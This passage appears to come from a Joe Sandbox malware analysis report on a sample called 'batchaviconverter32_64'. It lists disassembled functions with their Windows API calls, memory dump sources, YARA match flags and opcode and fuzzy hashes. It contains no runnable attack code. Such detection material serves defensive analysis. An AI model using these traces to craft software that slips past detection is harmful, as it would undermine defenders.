                                                              • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D834ED
                                                              • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D83518
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                              • String ID: CancelIoEx$KERNEL32
                                                              • API String ID: 2902213904-434325024
                                                              • Opcode ID: 2804fe24ece6c998cdf8c9be39e2b34db06c3ba4f4a80933757205a0f6f3d1fd
                                                              • Instruction ID: 48f376123c8ae77a461841afd27ef1c88019f85da578670d3ac17ca85c297a68
                                                              • Opcode Fuzzy Hash: 2804fe24ece6c998cdf8c9be39e2b34db06c3ba4f4a80933757205a0f6f3d1fd
                                                              • Instruction Fuzzy Hash: 3B317C75904205DFEB01AF68D844AAEBBF9FF48711F1084AAE8099B341D774DD11CBA1
                                                              Function 00405408 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                              • API String ID: 2238633743-4073082454
                                                              • Opcode ID: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                              • Instruction ID: 002c49bf34bfddc632f277928187d9a53126bd14f393e8a72b926efab3457658
                                                              • Opcode Fuzzy Hash: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                              • Instruction Fuzzy Hash: E1018431740705AFC7109FB4AD80E6B7AE9FB48791309843BB955F22A1D778C860CF69
                                                              Function 00403C59 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
                                                              • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
                                                              • WriteFile.KERNEL32(00000000), ref: 00403DA3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: File$HandleModuleNameWrite
                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $r@
                                                              • API String ID: 3784150691-1191147370
                                                              • Opcode ID: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                              • Instruction ID: 901e413bd7d296cb1b0b97d790854a8d5494ec17f79a926850544caa0371b074
                                                              • Opcode Fuzzy Hash: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                              • Instruction Fuzzy Hash: F831C772A04208AEEF20EF60DE49F9A776CEF45304F1004BBF545F61C1D6B8AA858A59
                                                              Function 004058D5 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
                                                              • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
                                                              • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
                                                              • LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: String$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 352835431-0
                                                              • Opcode ID: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                              • Instruction ID: ad677ee5f46337090c489763c5b1535e0d4a7e7cc2f37d679e5ddd81b555dfe6
                                                              • Opcode Fuzzy Hash: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                              • Instruction Fuzzy Hash: 8B516C71A00609EFCF218FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69
                                                              Function 02D91540 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,29E2DDE5), ref: 02D915E0
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D915F5
                                                              • ResetEvent.KERNEL32(00000000,29E2DDE5), ref: 02D915FF
                                                              • CloseHandle.KERNEL32(00000000,29E2DDE5), ref: 02D91634
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,29E2DDE5), ref: 02D916AA
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D916BF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandle$CreateOpenReset
                                                              • String ID:
                                                              • API String ID: 1285874450-0
                                                              • Opcode ID: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                              • Instruction ID: 44a95068c66046846b1b7e6ce0718d603793789085bc5dda1155e80692e9def8
                                                              • Opcode Fuzzy Hash: fd59793e34878e10ddbfd3a22be253b3904bce2d918f9716a2f7ff78a676ccac
                                                              • Instruction Fuzzy Hash: E6412A70D0535AABDF20DFA5C848BADBBB8EF05724F144619F819AB380D7309D05CBA0
                                                              Function 02D82081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D820AC
                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D820CD
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D820D8
                                                              • InterlockedDecrement.KERNEL32(?), ref: 02D8213E
                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D8217A
                                                              • InterlockedDecrement.KERNEL32(?), ref: 02D82187
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821A6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                              • String ID:
                                                              • API String ID: 1171374749-0
                                                              • Opcode ID: ffde32ff66600ba8b60154a93cb4999b4283148e5ee94ce78a8f828b68e7b4e6
                                                              • Instruction ID: 4e3919435e84939b0ad736da5086d8f9928bcdd3f44a80958aca50880370b37a
                                                              • Opcode Fuzzy Hash: ffde32ff66600ba8b60154a93cb4999b4283148e5ee94ce78a8f828b68e7b4e6
                                                              • Instruction Fuzzy Hash: B54139755047419FD321EF25D889A6BBBF9EBC8754F100A1EF89A82650D730E909CFA2
                                                              Function 02D91652 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02D91E00: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D9165E,?,?), ref: 02D91E2F
                                                                • Part of subcall function 02D91E00: CloseHandle.KERNEL32(00000000,?,?,02D9165E,?,?), ref: 02D91E44
                                                                • Part of subcall function 02D91E00: SetEvent.KERNEL32(00000000,02D9165E,?,?), ref: 02D91E57
                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,29E2DDE5), ref: 02D915E0
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D915F5
                                                              • ResetEvent.KERNEL32(00000000,29E2DDE5), ref: 02D915FF
                                                              • CloseHandle.KERNEL32(00000000,29E2DDE5), ref: 02D91634
                                                              • __CxxThrowException@8.LIBCMT ref: 02D91665
                                                                • Part of subcall function 02D9448A: RaiseException.KERNEL32(?,?,02D8FA91,?,?,?,?,?,?,?,02D8FA91,?,02DB0F88,?), ref: 02D944DF
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,29E2DDE5), ref: 02D916AA
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D916BF
                                                                • Part of subcall function 02D91B40: GetCurrentProcessId.KERNEL32(?), ref: 02D91B99
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,29E2DDE5), ref: 02D916CF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                              • String ID:
                                                              • API String ID: 2227236058-0
                                                              • Opcode ID: 3d7bf6d549a396ab1bee61ad9c9147592583d2133812b4fc9e8cc4a0f0984a47
                                                              • Instruction ID: 46741810742b1df897732e91cef1c91fa8815cd4c7dee8c2028a88f8fcc05b9f
                                                              • Opcode Fuzzy Hash: 3d7bf6d549a396ab1bee61ad9c9147592583d2133812b4fc9e8cc4a0f0984a47
                                                              • Instruction Fuzzy Hash: 84315A71E0135AABDF20DBA49C44BADB7B9AF05325F184219F81DEB380E760DD05CB61
                                                              Function 00404618 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 102memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual$FreeHeap
                                                              • String ID: r@$r@
                                                              • API String ID: 714016831-1712950306
                                                              • Opcode ID: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                              • Instruction ID: 6d2ae56a8b2e66d9b660bb9c1c671dd7469dd609f739855ae4ec176a3c74651c
                                                              • Opcode Fuzzy Hash: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                              • Instruction Fuzzy Hash: 3531BEB0940702ABD3309F24DD44B66B7A4EB86755F11463BF265BB2D0E7B8A8418B4D
                                                              Function 02D826DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D82706
                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D8272B
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DA5A93), ref: 02D82738
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D82778
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D827D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                              • String ID: timer
                                                              • API String ID: 4293676635-1792073242
                                                              • Opcode ID: 7310d9a0b3a439e7fab727e77d00eef560d59da6dbc7512709cb7a42504b8344
                                                              • Instruction ID: d135208a7dee63910ebc6c1306116236d5adf1d9e5bdc8d3909a571260698b40
                                                              • Opcode Fuzzy Hash: 7310d9a0b3a439e7fab727e77d00eef560d59da6dbc7512709cb7a42504b8344
                                                              • Instruction Fuzzy Hash: BF31ADB1908741AFD310EF25D988B6ABBE8FB48724F104A2EF95582780D770EC04CFA5
                                                              Function 02D95CC4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 02D95CC4
                                                                • Part of subcall function 02D98432: RtlEncodePointer.NTDLL(00000000), ref: 02D98435
                                                                • Part of subcall function 02D98432: __initp_misc_winsig.LIBCMT ref: 02D98450
                                                                • Part of subcall function 02D98432: GetModuleHandleW.KERNEL32(kernel32.dll,?,02DB1588,00000008,00000003,02DB0F6C,?,00000001), ref: 02D991B1
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D991C5
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D991D8
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D991EB
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D991FE
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D99211
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D99224
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D99237
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D9924A
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D9925D
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D99270
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D99283
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D99296
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D992A9
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D992BC
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D992CF
                                                              • __mtinitlocks.LIBCMT ref: 02D95CC9
                                                              • __mtterm.LIBCMT ref: 02D95CD2
                                                                • Part of subcall function 02D95D3A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D98868
                                                                • Part of subcall function 02D95D3A: _free.LIBCMT ref: 02D9886F
                                                                • Part of subcall function 02D95D3A: RtlDeleteCriticalSection.NTDLL(02DB3978), ref: 02D98891
                                                              • __calloc_crt.LIBCMT ref: 02D95CF7
                                                              • __initptd.LIBCMT ref: 02D95D19
                                                              • GetCurrentThreadId.KERNEL32 ref: 02D95D20
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 89a5fc9a099fe5c43fa10c29158bf464299dffe5dd8d3371fe477b891f7143e9
                                                              • Instruction ID: 4e51cbc95bf417143ec57bdef0f339298085e1e77a9ccab8beeeaaacf331df3a
                                                              • Opcode Fuzzy Hash: 89a5fc9a099fe5c43fa10c29158bf464299dffe5dd8d3371fe477b891f7143e9
                                                              • Instruction Fuzzy Hash: D8F0C2326583115AEF2636787C0968A2786DB02738F600A39F064D53C4FF219C009974
                                                              Function 02D933F1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 02D9340B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D93412
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02D9341E
                                                              • RtlDecodePointer.NTDLL(00000001), ref: 02D9343B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 3489934621-340411864
                                                              • Opcode ID: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                              • Instruction ID: a77177e8b96dc732a550562d7ed5cd4b25718588d233bf74f2210c60a0b78bc5
                                                              • Opcode Fuzzy Hash: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                              • Instruction Fuzzy Hash: 21E0E570ED0300EAFB211B72EC59F1A77B9BB05B43F605860B402D1384DBB59C689F50
                                                              Function 02D934C6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D933E0), ref: 02D934E0
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D934E7
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02D934F2
                                                              • RtlDecodePointer.NTDLL(02D933E0), ref: 02D9350D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                              • Instruction ID: 7ca71a9c29f3be23ee1a70be877f2443a16168f0fcdc04c7c0c9a5f331b5d43b
                                                              • Opcode Fuzzy Hash: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                              • Instruction Fuzzy Hash: 49E07EB1E90300EAEB615B61EC29F0A7BB9F704B06F201854F906E1384DBB89D249A54
                                                              Function 02D91E60 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(FFFFFFFF,29E2DDE5,?,?,?,?,00000000,02DA69F8,000000FF,02D920FA), ref: 02D91E9A
                                                              • TlsSetValue.KERNEL32(FFFFFFFF,02D920FA,?,?,00000000), ref: 02D91F07
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D91F31
                                                              • HeapFree.KERNEL32(00000000), ref: 02D91F34
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HeapValue$FreeProcess
                                                              • String ID:
                                                              • API String ID: 1812714009-0
                                                              • Opcode ID: 8631272467212d00f66db33c924aca8b4a5f05ed9f10b3ed76c69d6f2246ae9b
                                                              • Instruction ID: 37a1ef9ce73bfe7c5cb0e0e2f6f8822714ea439d9dc941dd2f86cc4f1bfef732
                                                              • Opcode Fuzzy Hash: 8631272467212d00f66db33c924aca8b4a5f05ed9f10b3ed76c69d6f2246ae9b
                                                              • Instruction Fuzzy Hash: 6E519B36A0424A9FDB20DF69C848F2ABBE4FB45664F198659F86D973C0D770EC00CB91
                                                              Function 02DA55C0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 02DA56D0
                                                              • __FindPESection.LIBCMT ref: 02DA56EA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                              • String ID:
                                                              • API String ID: 876702719-0
                                                              • Opcode ID: 7c3a1e81178abd8810151fa5bb6fcb68013beb665368f14d3c604cee24742e5e
                                                              • Instruction ID: ff37c662a92e73852631a51f1ac9bdd21e0091880570ed85cdaa34b78ef4d86c
                                                              • Opcode Fuzzy Hash: 7c3a1e81178abd8810151fa5bb6fcb68013beb665368f14d3c604cee24742e5e
                                                              • Instruction Fuzzy Hash: AFA19076E00215CFDB25CF28E9A0BADB7A5FB44324F984669D855AB340E731EC01CB90
                                                              Function 00405B24 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
                                                              • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
                                                              • MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: StringType$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 3852931651-0
                                                              • Opcode ID: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                              • Instruction ID: b73683cf29d179dc30ac0dacbc12c8afa3e963ef4805c6be7b54428ebd0f8a91
                                                              • Opcode Fuzzy Hash: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                              • Instruction Fuzzy Hash: 1E417B71500609EFDF219F94DD86AAF7F79EB05750F10443AFA12B6290C339A960CBA9
                                                              Function 02D81C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D81CB1
                                                              • CloseHandle.KERNEL32(?), ref: 02D81CBA
                                                              • InterlockedExchangeAdd.KERNEL32(02DB7244,00000000), ref: 02D81CC6
                                                              • TerminateThread.KERNEL32(?,00000000), ref: 02D81CD4
                                                              • QueueUserAPC.KERNEL32(02D81E7C,?,00000000), ref: 02D81CE1
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D81CEC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1946104331-0
                                                              • Opcode ID: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                              • Instruction ID: 444e0c08a3edf9ccedb0f5df00490278d12f65bf01c3b529c15427105228a372
                                                              • Opcode Fuzzy Hash: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                              • Instruction Fuzzy Hash: 8EF04432940214BFE7105B96ED0ED5BFBBCEB85721B104A5DF66A82390DB709D14CB64
                                                              Function 02D907F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02D89A0B: __EH_prolog.LIBCMT ref: 02D89A10
                                                                • Part of subcall function 02D89A0B: _Allocate.LIBCPMT ref: 02D89A67
                                                                • Part of subcall function 02D89A0B: _memmove.LIBCMT ref: 02D89ABE
                                                              • _memset.LIBCMT ref: 02D90869
                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908D2
                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
